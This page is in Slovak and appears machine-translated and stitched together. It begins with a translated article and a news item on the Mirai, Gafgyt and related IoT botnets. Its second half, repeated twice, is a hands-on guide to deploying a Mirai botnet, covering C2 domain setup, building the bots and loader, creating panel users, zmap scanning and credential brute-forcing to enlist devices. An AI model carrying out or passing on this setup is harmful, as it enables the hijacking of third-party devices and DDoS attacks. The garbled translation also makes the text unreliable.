S rastúcou popularitou a rozsahom prejavov na internete zločinci začali používať toto zariadenie ako platformu na organizovanie najnovších kybernetických útokov. Úroveň závažnosti a počet vážnych bezpečnostných incidentov týkajúcich sa takýchto zariadení ukázali, že zápach najslabšieho bezpečnostného lana každodenného života počítačová sieť. A priznajme si, že zložitosť väčšiny predmetov na internete ďaleko presahuje možnosti PC a nedostatok je spôsobený množstvom zariadení, ktoré sú spojené do jedného celku. Všetky smrady sú vždy spojené s Merezhou a často sa v továrenskej konfigurácii stávajú zbraňou pre útočníkov. Veľký počet, široké rozšírenie a nízka úroveň krádeží zariadení na internete prejavov už prilákali množstvo zločincov, ktorí s ich pomocou aktívne kontrolujú DDoS útoky.
„Maybutne“ je už tu
Nedávne široko veľký zadok- botnet Mirai (z japonského "maybutne". - Poznámka vyd.
), prvé nálezy v kosáku z roku 2016 predsánkovej skupiny MalwareMustDie. Samotná hotovosť, ako aj jej číselné varianty a nástupcovia sa stali zdrojom najvážnejších DDoS útokov v histórii IT priemyslu. Na jar 2016 začala stránka konzultanta pre počítačovú bezpečnosť Briana Krebsa prijímať návštevnosť s rýchlosťou 620 Gbps, čo je rádovo viac za cenu, pričom väčšina stránok ide dobre. Približne v rovnakom čase zasiahol OVH, francúzskeho poskytovateľa webhostingových služieb, čoraz intenzívnejší útok DDoS, podporovaný Mirai (1,1 Tbps). ponuré služby
. Nezabar zverejnil zľavový kód, po ktorom zločinci začali na tomto základe prenajímať botnety, ktoré stáli až 400-tisíc. prístavby Ďalšia séria útokov Mirai, s najväčšou pravdepodobnosťou organizovaná proti poskytovateľovi služieb Dyn, zasiahla v posledných rokoch stovky stránok vrátane Twitter, Netflix, Reddit a GitHub. Mirai nájdete vo všetkých typoch webových kamier, digitálnych videorekordérov, routerov a pod., ktoré bežia na niektorej z verzií BusyBox. Potom je riedkosť vysvetlená administratívnymi presvedčeniami iných zariadení na internete prejavov jednoduchým vymenovaním, vikorystom a malým slovníkom typických pre knihovníkov rozšírenia hraníc
Mutácie Mirai sa v priebehu rokov začali objavovať doslova každý deň a tie, ktoré sa dokázali premnožiť a stať sa škodlivými pomocou rovnakých metód ako v origináli, naznačujú chronické ochorenie výrobcov rastlín zariadenia Používam tie najjednoduchšie metódy na ochranu reči na internete. Nie je prekvapujúce, že botnety vytvorené z takýchto zariadení boli zle monitorované, bez ohľadu na to, že sofistikovanejšie útoky na nich založené by mohli potenciálne zničiť celú internetovú infraštruktúru.
Princíp Mirai
Mirai spúšťa DDoS útok proti cieľovým serverom a aktívne sa šíri cez zariadenia Internet of Speech s nechránenou konfiguráciou.
Hlavné komponenty
Botnet Mirai sa skladá zo štyroch hlavných komponentov. Robot je odpad, ktorý infikuje zariadenia a šíri „infekciu“ medzi nesprávne nakonfigurované zariadenia a potom útočiaci cieľový server s oddeleným príkazom odstráneným od botmastera - ľudí, ktorí spravujú roboty. Podporný server poskytuje botmasterovi rozhranie, ktoré mu umožňuje kontrolovať sieť botnetu a iniciovať nové DDoS útoky. Komunikácia medzi prvkami infraštruktúry botnetu prebieha prostredníctvom anonymnej siete Tor. Dodávateľ zabezpečí rozšírenie súborov pre všetky hardvérové platformy (celkovo 18 vrátane ARM, MIPS, x86 a ďalších) priamym kontaktom s novými obeťami. Call server udržiava databázu s informáciami o všetkých zariadeniach v botnete a silne infikované uzly sa vyzývajú, aby sa k tomuto serveru pripojili priamo.
Schéma činnosti a komunikácie v botnete
Na internete Mirai skenuje porty 23 a 2323 za bežnými verejnými IP adresami. Niektoré adresy sú deaktivované (prakticky, aby nedošlo k zraneniu úradov) – napríklad poštová služba USA, Pentagon, IANA, ako aj General Electric a Hewlett-Packard. Na obr. 1 znázorňuje hlavné fázy činnosti a výmeny údajov v botnete.
1. fáza Bot môže vykonať útok spôsobom výberu podľa údajov zariadení na internete prejavov, ktorých výrobné nastavenia sa nezmenili. Slovník Mirai má 62 možných párov meno-heslo.
2. fáza Po zistení pracovných údajov a odmietnutí prístupu k nim príkazový riadok alebo grafický koristuvach rozhranie Nastavím to, robot prenesie svoje charakteristiky na server hovorov cez iný port.
3. fáza Botmaster pravidelne kontroluje potenciálne ciele a streamovaciu sieť botnetu pripojením sa k call serveru cez Tor.
4. fáza Po výbere úniku zariadenia na infekciu botmaster vidí všetky potrebné príkazy a všetky potrebné podrobnosti vrátane IP adries a informácií o hardvérovej architektúre.
5. fáza. Prihláste sa do systému plnenia do fliaš a stlačte zariadenie a spustite príslušný súbor poškodeného súboru. Budete sa musieť spoľahnúť na dodatočnú pomôcku GNU Wget pre protokol TFTP. Je pozoruhodné, že akonáhle je malvér spustený, snaží sa chrániť pred konkurentmi blokovaním portov, cez ktoré sa často vyskytujú infekcie, vrátane Telnetu a SSH. V tejto fáze čerstvej tvorby sa inštancia robota teraz môže zlúčiť s iným serverom a prijímať nové príkazy na spustenie útoku. Na tento účel musíte použiť názov domény, ktorý je pevne zakódovaný v súbore (podľa Mirai na cnc.changeme.com). Táto metóda, ktorá nahrádza priamu IP adresu pre botmastera, umožňuje botmasterovi zmeniť IP adresy základného servera bez úpravy dvoch súborov alebo dodatočnej výmeny informácií.
6. fáza Botmaster prikáže všetkým inštanciám botov, aby spustili útok proti cieľovému serveru, pričom prejdú základnými parametrami každého servera, vrátane typu a závažnosti útoku, ako aj IP adries samotného servera a inštancií botov.
7. fáza Boti začnú útočiť na cieľ pomocou jednej z tucta dostupných metód, vrátane zaplavenia generického smerovania, protokolov TCP a HTTP.
Charakteristika ryže Mirai
Na rozdiel od iných podobných podvodníkov, Mirai nie je určený na identifikáciu. V mnohých štádiách infekcie existujú charakteristické znaky, ktoré možno rozpoznať pomocou jednoduchej analýzy hraníc: triedenie aktuálnych údajov cez porty skladieb; posilnenie skladov špeciálnym poradím značiek; príťažlivosť charakteristických dvojitých pilníkov; výmena informácií s cieľom ušetriť peniaze; prenos kľúčových príkazov s charakteristickou štruktúrou; V útočnej prevádzke prakticky nie je núdza o útočné prvky.
_600.png) |
Na obr. 2 ukazuje štandardný režim a spojenie medzi infikovaným Mirai a zariadením pre internet reči, ktoré je už infikované, ale ešte nezačalo útok. Trvanie relácií sa líši, ako aj typ a veľkosť balíkov, ako aj postupnosť hlásení podľa vzorov, ktoré naznačujú kontamináciu týmto veľmi pomalým prílevom.
Varianty Mirai
Zdalo by sa, že zverejnenie výstupného kódu Mirai a jeho zjavne hlasný hraničný šum by viedli k rýchlemu vzniku účinných rozpoznávacích a ochranných mechanizmov. Nič sa však nestalo: len dva mesiace po zverejnení výstupného kódu sa počet kópií robota zvýšil viac ako dvojnásobne, z 213-tisíc. až 493 tisíc a objavilo sa veľké množstvo odrôd. Viac skazy po objavení Mirai, roboti aj vikori využívali slabé konfigurácie štruktúr rovnakého typu, hneď od začiatku.
Väčšina infekcií Mirai sa prenáša cez porty TCP 23 a 2323 a na jeseň roku 2016 boli zistené niektoré vírusy, ktoré sa šíria na iné porty, vrátane až 7547, čo sa poskytovatelia internetu snažia terapia na diaľku klientske smerovače. Jedna z týchto možností Mirai navyše funguje už mesiace a pripravila najmenej milión predplatiteľov Deutsche Telekom bez prístupu k Merezhi.
Koncom roka 2017 sa ďalší variant Mirai stretol s DDoS útokom za 54 rokov proti jednej z amerických vysokých škôl. Tento mesiac sa objavila ďalšia odroda - tentoraz s využitím metód ťažby bitcoínov, aj keď podľa odhadov by používanie rečových zariadení na internete na tieto účely sotva mohlo priniesť veľa zisku.
Mesto zaznamenalo zvýšenú aktivitu z Persirai, ďalšieho botnetu vytvoreného pomocou kódovej základne Mirai. Túto zombie hranicu identifikovali nástupcovia Trend Micro, ktorí im dali slová Perzský a Mirai – ten prvý bol vybraný v súlade s iránskym prístupom k nezbedníkom. Prístup k rozhraniu webových kamier predchádzajúcich prijímačov môžete zakázať cez TCP port 81. Po úspešnom preniknutí do smerovača s protokolom UPnP budete môcť pristupovať k sieti a spustiť sériu ďalšie súbory Vіykovyh. Namiesto toho, aby ste museli poskytnúť potrebné údaje na vstup do rozhrania fotoaparátu prostredníctvom výberu, vírus obsahuje zero-day break, ktorý vám umožňuje získať súbor s heslom. Distribuovaný DoS útok je založený na dodatočnom zahltení protokolu UDP. Podľa odhadov ich bolo v Merezhi celkovo takmer 120 tisíc. plnenie predĺženia pre Persirai.
Ďalšie botnety založené na internete prejavov
Opierajúc sa o základné princípy Mirai, tvorcovia nových zombíkov začali využívať iné, zložitejšie mechanizmy na zvyšovanie napätia a maskovanie aktivity zombíkov.
Začiatkom roka 2016 vedci z organizácie MalwareMustDie informovali o prvom botnete založenom na internete prejavov, výtvoroch zo skriptov Wikipedia Lua. Väčšina armád botnetov nainštalovala káblové modemy s procesormi ARM so servermi Linux. Dostupnosť má zložité funkcie – napríklad vytvára šifrovaný kanál na výmenu údajov s iným serverom a nastavuje špeciálne pravidlá iptables na ochranu infikovaných zariadení pred konkurenciou.
Botnet Hajime, ktorý v marci 2016 objavili podvodníci Rapidity Networks, sa zneužíva pomocou infekčnej metódy podobnej ako Mirai. Namiesto centralizovanej architektúry Hajime je založená na systéme distribuovaného prepojenia, ktorý používa BitTorrent Distributed Hash Tag (DHT) na identifikáciu sietí peer-to-peer a transportný protokol vikoryst uTorrent na ich výmenu. Všetky informácie sú šifrované pomocou protokolu RC4. Hadžime sa zatiaľ neukázal z negatívnej stránky, vníma však potenciál pre konflikty v zariadeniach internetu prejavov, akými sú vikoristické botnety, podobne ako Mirai, v súvislosti s ktorými vznikla myšlienka, že by vytvoriť Vyzerám ako "Robin Hood". Skutočný účel botnetu už nie je záhadou.
Botnet BrickerBot, podobne ako Mirai, infikuje bezpečnostný program BusyBox, ako zistili experti Radware v januári 2017. Poškodenie dôveryhodných údajov nainštalovaných za službou SSH, ako aj mierne konfigurácie a úniky, nedostatok energie podporuje trvalé útoky na VIDMA v službe (PDoS, Permanent DoS) proti zariadeniam internetu prejavov, takže dosť ničivých na to, aby som ich znova rozdrvil pred vikoristanya. nahradenie majetku. BrickerBot skenuje firmvér zariadení, odstraňuje na nich súbory a mení nastavenia.
Lekcie
Rozsiahla katastrofa spôsobená útokmi Mirai, jeho variantov a podobných botnetov jasne demonštrovala riziká, ktoré vytvárajú zariadenia internetu prejavov pre celý svet. V súčasnosti tieto typy zariadení ovládajú a vytvárajú veľké ničivé armády „zombie“. Útočníkov priťahuje jednoduchosť rastu populácie robotov. Existuje päť hlavných dôvodov, prečo je vytváranie botnetov obzvlášť zrejmé prostredníctvom používania internetových zariadení.
- Stála, neprerušovaná činnosť. Okrem notebookov a stolných počítačov, ktoré sa často zapínajú a vypínajú, funguje veľa internetových zariadení (v zmysle webových kamier a smerovačov Wi-Fi) a vládcovia ich často vnímajú ako zariadenia, ktoré nemôžu byť infikované.
- Vidsutnіst zakhistu. Mnohé generátory zariadení, ktoré sa ponáhľajú vstúpiť na trh internetu prejavov, nemajú bezpečnosť, čím viac rešpektujú jednoduchosť a jednoduchosť vyhľadávania.
- Podlieha kontrole. Väčšina internetových zariadení sa riadi princípom „nastav a zabudni“ – po prvotnom nastavení ich správcovia systému môžu rešpektovať, ak prestanú normálne fungovať.
- Veľká návštevnosť útokov. Dnešné internetové zariadenia sú dostatočne odolné a ťažko ovládateľné na generovanie návštevnosti DDoS útokov, rovnako ťažké ako dnešné stolné počítače.
- Neinteraktívne alebo minimálne interaktívne zákaznícke rozhrania. Fragmenty zariadenia internetu prejavov si budú vyžadovať minimálne množstvo peňazí, ktoré sa majú dať korešpondentovi, infekcia sa čoskoro stane neoznačenou za všetko. Ale navіt, ako ho označiť, nie je k dispozícii koristuvacham jednoduchými spôsobmi Problém vyriešim fyzickou výmenou.
Vznik DDoS útokov, ktoré postihujú zariadenia Internet of Speech, prebieha už dlhší čas a dnes existujú čoraz pokročilejšie možnosti a nástupcovia Mirai pribúdajú alarmujúcim tempom. Takéto zľavy sú spôsobené kreatívnymi aktivitami na bohatých platformách a kvôli nízkej kapacite zdrojov sa môžu uspokojiť s minimom RAM. Okrem toho je postup infekcie jednoznačne jednoduchý, vďaka čomu je akýkoľvek liek kandidátom na premenu na zombie, ktorá je často znovu infikovaná. Väčšina populárnych prejavov na internete sa dnes dá ľahko odhaliť a analyzovať, no nová práca sa stáva ešte tajnejšou.
Väčšinu zodpovednosti za DDoS útoky nesú samotní účtovníci a správcovia systému, ktorí sa nestarajú o základné prístupy typu backdoor. Avšak v náraste botnetov na internete prejavov sú všetky dôkazy na strane výrobcov, ktorí vyrábajú mierne kradnuté produkty s továrenskými úpravami. vzdialený prístup. Okrem toho iba poskytovatelia internetových zariadení majú možnosť automaticky vydávať aktualizácie zabezpečenia, aby sa chránili pred infekciou. Primárne metódy zvyšovania spoľahlivosti, ktoré vyžadujú ručné zadávanie, ako napríklad časté zmeny hesiel, pre internetové hlasové zariadenia sú nemožné, pretože správanie takýchto zariadení je stále založené na princípe samoregulácie. Preto dnes internet potrebuje prejavy technické vlastnosti kontrola bezpečnosti, ako aj premyslené normy na ochranu zariadení, povinné pre údržbu všetkých pracovníkov pošty.
Geoffrey Voas ( [chránený e-mailom]) – vedecký advokát IEEE.
Constantinos Kolias, Georgios Kambourakis, Angelos Stavrou, Jefrey Voas, DDoS v IoT: Mirai a iné botnety. IEEE Computer, júl 2017, IEEE Computer Society. Všetky práva vyhradené.
Pretlačené so súhlasom. Dva z najpopulárnejších a najrozšírenejších IoT botnetov – Mirai a Gafgyt – sa budú naďalej množiť. Boli identifikované nové varianty týchto podvodov, ktorých cieľom je podnikovom sektore
. Hlavná hrozba kybernetickej bezpečnosti spočíva v dobre organizovaných a pretrvávajúcich DDoS útokoch. Dôvod takejto prevalencie týchto dvoch malvérov spočíva v hneve výstupný kód
, ktorý sa stal prístupným pre rozľahlosť sveta, nie je na to dôvod. Vznikajúci počítačoví zločinci začali na tomto základe okamžite vyvíjať svoje škodlivé programy.
Vo väčšine prípadov, spoliehajúc sa na neschopnosť páchateľov zla, klony Mirai a Gafgyt nepredstavovali žiadne vážne projekty a nerobili významné zmeny vo svojich schopnostiach.
Všetky ostatné varianty botnetov preukázali tendenciu infikovať podnikové zariadenia. Správa z jednotky 42 tímu Palo Alto Networks hovorí, že nové verzie Mirai a Gafgyt pridali do svojho arzenálu množstvo nových exploitov, ktoré spochybňujú staré exploity.
Mirai teraz útočí na systémy, ktoré boli spustené kvôli neoplateným Apache Struts (samotné boli v minulosti poškodené). Oprava pre porušenie CVE-2017-5638 je už náročnejšia, ale, samozrejme, nie všetky boli aktualizované svojou inštaláciou. Všetko v Mirai Dánsky moment
Gafgyt (tiež známy ako Baslite) útočí aj na podnikateľské subjekty a zameriava sa na nedávno objavenú expozíciu CVE-2018-9866. Tento kritický bezpečnostný nedostatok je prítomný v nepodporovaných verziách systému globálnej správy (GMS) od spoločnosti SonicWall. Nástupcovia jednotky 42 zaznamenali nové známky 5. kosáka, len týždeň po zverejnení modulu Metasploit pre tento únik.
Zariadenia Gafgyt dokážu odhaliť iné zariadenia kvôli rôznym bezpečnostným problémom a môžu na ne tiež zaútočiť bežnými exploitmi. Ďalším typom útoku, ktorý môže spôsobiť tento druh malvéru, je Blacknurse, útok ICMP, ktorý výrazne ovplyvňuje CPU, čo môže viesť k zlyhaniu služby.
Odborníci tiež zistili, že dve nové varianty botnetov boli hosťované na rovnakej doméne. To má dokázať, že za nimi stojí ten istý kybernetický zloduch alebo ich skupina.
Koncom minulého mesiaca sme boli informovaní, že... Vyplýva to z údajov Global Threat Index za rok 2018.
A práve tento mesiac orgány činné v trestnom konaní odhalili osobu, ktorá stojí za jedným z najpopulárnejších zariadení Mirai – Satori. Ukázalo sa, že kyberzločinec bol predvolaný na túto hodinu.
Potrebujeme dva VPS KVM servery a doménu. Virtualizácia samotného KVM, OpenVZ znova a znova.
Beriem tu servery
Na jeden server umiestnime názov samotného botnetu, na druhý naskenujeme názov botov. (surovosť)
DÔLEŽITÉ. Servery musia byť založené na Debiane 8 a musia mať aspoň 1 GB RAM.
Bez ohľadu na doménu na tom nezáleží.
Je zrejmé, že vám nepoviem, ako pripojiť doménu VPS. Nie je to zložité, prídete na to sami.
PuTTY A začnime.
# apt-get update -y
# apt-get upgrade -y
# apt-get install rozbaľte gcc golang obrazovky elektrického plotu sudo git -y
# apt-get install mysql-server -y
# apt-get install mysql-client -y
# apt-get install apache2 -y
Pri inštalácii MySQL budete musieť vytvoriť heslo pre prístup k MySQL pre užívateľa root. Prídete s normálnym heslom bez obvyklého „qwerty“
Napíšte, kde ho budeme opäť potrebovať.
# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y
#bash< <(curl -s -S -L
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
)# gvm install go1.4
# gvm použite go1.4 [--default]
# gvm install go1.4 -B
# gvm použite go1.4
# export GOROOT_BOOTSTRAP=$GOROOT
# gvm install go1.5
# gvm použite go1.5
# gvm install go1.8
# gvm použite go1.8
Po nainštalovaní všetkých nástrojov si stiahnite výstupné roboty -
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
Nahrávam na server. Tím wget alebo jednoducho prostredníctvom programu WinSCP.
# unzip Mirai-Source-Code-master.zip
# cd Mirai-Source-Code-Master/mirai/tools
# gcc enc.c -o enc
# ./enc string *****(Napíšte svoju doménu tak, ako ste ju pripojili k serveru) a stlačte kláves Enter.
Tu vidíte nasledujúci text:
XOR s 14 bajtmi údajov...
\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22
14 - Tu budete mať iné číslo, takže sa nechváľte, všetko je pravda.
Skopírujeme celý text.
Otvorené cez nano editor alebo cez WinSCP súbor tabuľka.c kto je v mene pápeža mirai/bot
Musíte venovať pozornosť
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
riadok add_entry(TABLE_CNC_DOMAIN- všetko, čo sa v labkách vymení za vlastný text, ktorý bol starostlivo skopírovaný. Zamist " 30 " Píšeme naše číslo, ktoré bolo tiež starostlivo skopírované. To isté nesmelo v rade add_entry(TABLE_SCAN_CB_DOMAIN
Uložte a zatvorte editor.
Súbor otvorí editor mirai/cnc/main.go
Bachimo tse -
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
"127.0.0.1" zmeniť na "127.0.0.1:3306"
"heslo" Zmeníme na naše heslo MySQL, ktoré bolo zadané skôr. "
Uložte súbor a zatvorte editor.
Len skopírujte všetky tieto kecy, nepoviem vám nič, čo je potrebné.
# mkdir /etc/xcompile
# cd /etc/xcompile
#wget
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
#wget
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
#wget
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
#wget
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
#wget
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
#wget
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
#wget
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
#wget
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
#wget
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
# tar -jxf cross-compiler-armv4l.tar.bz2
# tar -jxf cross-compiler-i586.tar.bz2
# tar -jxf cross-compiler-m68k.tar.bz2
# tar -jxf cross-compiler-mips.tar.bz2
# tar -jxf cross-compiler-mipsel.tar.bz2
# tar -jxf cross-compiler-powerpc.tar.bz2
# tar -jxf cross-compiler-sh4.tar.bz2
# tar -jxf cross-compiler-sparc.tar.bz2
# tar -jxf cross-compiler-armv6l.tar.bz2
# rm *.tar.bz2
# mv krížový kompilátor-armv4l armv4l
# mv cross-compiler-i586 i586
#mv cross-compiler-m68k m68k
# mv cross-compiler-mips mips
# mv cross-compiler-mipsel mipsel
# mv cross-compiler-powerpc powerpc
# mv cross-compiler-sh4 sh4
# mv cross-compiler-sparc sparc
# mv krížový kompilátor-armv6l armv6l
# export PATH=$PATH:/etc/xcompile/armv4l/bin
# export PATH=$PATH:/etc/xcompile/i586/bin
# export PATH=$PATH:/etc/xcompile/m68k/bin
# export PATH=$PATH:/etc/xcompile/mips/bin
# export PATH=$PATH:/etc/xcompile/mipsel/bin
# export PATH=$PATH:/etc/xcompile/powerpc/bin
# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
# export PATH=$PATH:/etc/xcompile/sh4/bin
# export PATH=$PATH:/etc/xcompile/sparc/bin
# export PATH=$PATH:/etc/xcompile/armv6l/bin
# export PATH=$PATH:/usr/local/go/bin
# export GOPATH=$HOME/Documents/go
# prejdite na github.com/go-sql-driver/mysql
# prejdite na github.com/mattn/go-shellwords
# cd Mirai-Source-Code-master/mirai
# ./build.sh ladenie telnetu
# ./build.sh uvoľní telnet
# mv mirai* /var/www/html
# cd /var/www/html
#mkdirbins
#mv*bins/
Teraz MySQL.
# mysql -u root -p
Tu budete požiadaní o heslo. Zadajte heslo, ktoré bolo predtým nastavené.
# vytvoriť databázu mirai;
# použite mirai
Teraz sem skopírujeme celý text.
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
Prilepte a embosujte Enter.
Skopírujeme text sem -
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
Zamist Anna-senpai napíšte svoje prihlasovacie meno. Hocičo.
To isté s mäkkým vstupom. Tieto údaje budú potrebné na to, aby sme mali prístup k riadiacemu panelu robota. Môže to byť takto -
INSERT INTO users VALUES (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");
Kopírovať, prilepiť, embosovať Enter.
Teraz sa môžete prihlásiť.
Všetko je už super.
# cd Mirai-Source-Code-master/mirai/release
# touch prompt.txt
# obrazovka ./cnc Prosím napíš
MySQL DB bola otvorená
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
Túto reláciu nezatvárame, otvárame novú.
Namiesto ******** napíšte svoju doménu a pečiatku Open.
Zadajte svoje prihlasovacie meno a heslo, v mojom poli je -
zaebalsjapisatj
To je všetko, sme v paneli s robotom.
Teraz potrebujeme nejakú prácu. Všetko je tu jednoduché, nevyžaduje sa žiadna inštalácia.
Upravujeme nakladač.
Na to, aby bolo možné pridávať roboty z textových súborov, je potrebný Loader. Je možné, že sme zhromaždili veľa zariadení (routery, fotoaparáty, telefóny) a na ich pridanie do robota potrebujeme nakladač.
Takže samotný nakladač je "khrobak" Pripojte sa k nášmu serveru cez
PuTTY a WinSCP. Pre ďalšiu pomoc, WinSCP pozná súbor main.c v papa
Mirai-Source-Code-master/dlr
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
Na snímku obrazovky napíšeme IP nášho servera -
Kedykoľvek to stratíte, tak to bude. Uložíme a zatvoríme. Teraz PyTTY
choď na náš server a napíš -
# cd Mirai-Source-Code-master/dlr
# chmod 777 *
# ./build.sh
# vydanie CD
# mv dlr* ~/Mirai-Source-Code-master/loader/bins WinSCP Teraz kričíme Pre ďalšiu pomoc, WinSCP pozná súbor main.c nájdem súbor
Mirai-Source-Code-master/loader/src
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
Zmeňte na svoju IP ako na obrazovke -
Uložíme a zatvoríme. PuTTY -
# chmod 777 *
Cez WinSCP Pre ďalšiu pomoc Súbor sa otvára scanListen.go ktoré možno poznať od pápeža
Mirai-Source-Code-master/mirai/tools
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
Zmeňte IP adresu svojho servera - Teraz -
Potom
# cd Mirai-Source-Code-master/mirai/tools
# choďte vytvoriť scanListen.go Teraz máme nový súbor scanPočúvajte (bez.choď Teraz máme nový súbor)
Teraz máme nový súbor, Len musíte sa presunúť do priečinka
Mirai-Source-Code-master/loader WinSCP Len pre ďalšiu pomoc hodiť to do priečinka
nakladač
Teraz skontrolujeme, či všetko funguje
# ./loader
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
Ako viete, tie na obrazovke znamenajú, že všetko je správne -
Ak máte nejaké otázky, napíšte do témy, pomôžem vám. hodiť to do priečinka Ak chcete prilákať roboty do zoznamu, vložte text do priečinka
a zadajte príkaz -
# zoznam mačiek.txt | ./nakladač
Všetko, čo ste od vás získali, bude na váš príkaz umiestnené na stránky.
Tento spôsob sa mi veľmi nepáči, poznám najjednoduchší spôsob. Tu potrebujeme ďalší server. Presne takto
# apt-get update -y
# apt-get upgrade -y
# apt-get install python-paramiko -y
# apt-get install zmap -y
zmap Potrebujeme ho na skenovanie portov. Princíp robota KPortScan, Len 50-krát viac švédsky.
Skopírujeme celý kód sem -
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
Ukladám ako scan.py
Tu môžete pridať svoje heslá a prihlasovacie údaje.
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
riadok kombožiaden strach!
Tu musíte zaregistrovať IP servera, na ktorom sa robot nachádza.
Je vašou zodpovednosťou sa zaregistrovať, aby ste zabezpečili dokončenie.
Všetko sa dá zmeniť a uložiť.
Súbor scan.py je umiestnený kdekoľvek na našom serveri. Na inom serveri, ktorý je čisto na skenovanie, na ktorom sa bot nedá nájsť.
Potrebujeme IP, ako sme skenovali.
#zmap -p22 -o zoznam.txt -B 100M(môžete skenovať iné porty, ja som najskôr naskenoval 22 alebo 23)
Všetky výsledky budú v súbore list.txt
Potom sme zhromaždili súbor IP (čím väčší, tým lepší). list.txt hodíme príkaz do súboru scan.py a píšeme -
# python scan.py list.txt 500
Všetci sedíme a žasneme nad tým, ako náš botnet rastie.
Ak máte aspoň 200 robotov, môžete spustiť nakladač.
Za týmto účelom prejdeme na server, kde je nainštalovaný botnet -
# cd Mirai-Source-Code-master/loader
# ulimit -n 9999999
# ./scanListen | ./nakladač
Teraz sa robot riadi princípom „hrobaka“ a dosahuje viac ako roboty.
Nebudem sa príliš naťahovať, ale poviem, že robotický softvér na stránke funguje skvele. Prvý ruský manuál z inštalácie Mirai. Historická blbosť
Potrebujeme dva VPS KVM servery a doménu. Virtualizácia samotného KVM, OpenVZ znova a znova.
Na jeden server umiestnime názov samotného botnetu, na druhý naskenujeme názov botov. (surovosť)
Mám servery tu - https://www.nforce.com/
Neboli žiadne problémy, žiadne zákazy.
Pre tých, ktorí sa chcú len pýtať, čo tam je a čo, si môžete vyskúšať testovacie servery tu - https://adminvps.ru/
DÔLEŽITÉ. Servery musia byť založené na Debiane 8 a musia mať aspoň 1 GB RAM.
Bez ohľadu na doménu na tom nezáleží.
Je zrejmé, že vám nepoviem, ako pripojiť doménu VPS. Nie je to zložité, prídete na to sami.
Pripojíme sa k nášmu serveru cez PuTTY a začíname.
# apt-get update -y
# apt-get upgrade -y
# apt-get install rozbaľte gcc golang obrazovky elektrického plotu sudo git -y
# apt-get install mysql-server -y
# apt-get install mysql-client -y
# apt-get install apache2 -y
Pri inštalácii MySQL budete musieť vytvoriť heslo pre prístup k MySQL pre užívateľa root. Prídete s normálnym heslom bez obvyklého „qwerty“
Napíšte, kde ho budeme opäť potrebovať.
# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y
#bash< <(curl -s -S -L https://raw.githubusercontent.com/moovweb/gvm/master/binscripts/gvm-installer)
# gvm install go1.4
# gvm použite go1.4 [--default]
# gvm install go1.4 -B
# gvm použite go1.4
# export GOROOT_BOOTSTRAP=$GOROOT
# gvm install go1.5
# gvm použite go1.5
# gvm install go1.8
# gvm použite go1.8
Po nainštalovaní všetkých nástrojov si stiahnite výstupné roboty a nahrajte ich na server. Príkaz wget alebo jednoducho cez program WinSCP.
# unzip Mirai-Source-Code-master.zip
# cd Mirai-Source-Code-Master/mirai/tools
# gcc enc.c -o enc
# ./enc string vlmi.su (napíšte svoju doménu, ktorá je pripojená k serveru) a vyrazené Enter
Tu vidíte nasledujúci text:
XOR s 14 bajtmi údajov...
\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22
14 - tu budete mať iné číslo, takže sa nechváľte, všetko je správne.
Skopírujeme celý text.
Dá sa otvoriť cez nano editor alebo cez WinSCP súbor table.c, ktorý sa nachádza v priečinku mirai/bot
Povinni pobachiti tse - https://prnt.sc/gcxa2m
Riadok add_entry(TABLE_CNC_DOMAIN – všetko v labkách sa zmení na váš text, ktorý bol starostlivo skopírovaný. Na miesto „30“ napíšeme vaše číslo, ktoré bolo tiež starostlivo skopírované. To isté s riadkom add_entry(TABLE_SCAN_CB_DOMAIN)
Uložte a zatvorte editor.
Poďme ďalej.
Súbor mirai/cnc/main.go otvorí editor
Bachimo tse – https://prnt.sc/gcxdtz
"127.0.0.1" sa zmení na "127.0.0.1:3306"
"heslo" sa zmení na naše heslo MySQL, ktoré bolo zadané skôr. "
Uložte súbor a zatvorte editor.
Len skopírujte všetky tieto kecy, nepoviem vám pravdu, nepoviem.
# mkdir /etc/xcompile
# cd /etc/xcompile
# tar -jxf cross-compiler-armv4l.tar.bz2
# tar -jxf cross-compiler-i586.tar.bz2
# tar -jxf cross-compiler-m68k.tar.bz2
# tar -jxf cross-compiler-mips.tar.bz2
# tar -jxf cross-compiler-mipsel.tar.bz2
# tar -jxf cross-compiler-powerpc.tar.bz2
# tar -jxf cross-compiler-sh4.tar.bz2
# tar -jxf cross-compiler-sparc.tar.bz2
# tar -jxf cross-compiler-armv6l.tar.bz2
# mv krížový kompilátor-armv4l armv4l
# mv cross-compiler-i586 i586
#mv cross-compiler-m68k m68k
# mv cross-compiler-mips mips
# mv cross-compiler-mipsel mipsel
